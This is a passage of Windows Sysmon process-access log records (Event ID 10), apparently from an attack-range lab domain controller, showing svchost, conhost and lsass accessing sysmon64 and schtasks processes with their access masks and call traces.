{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.260\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010FF5A0800}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.260","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010FF5A0800}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.260\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010FF5A0800}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 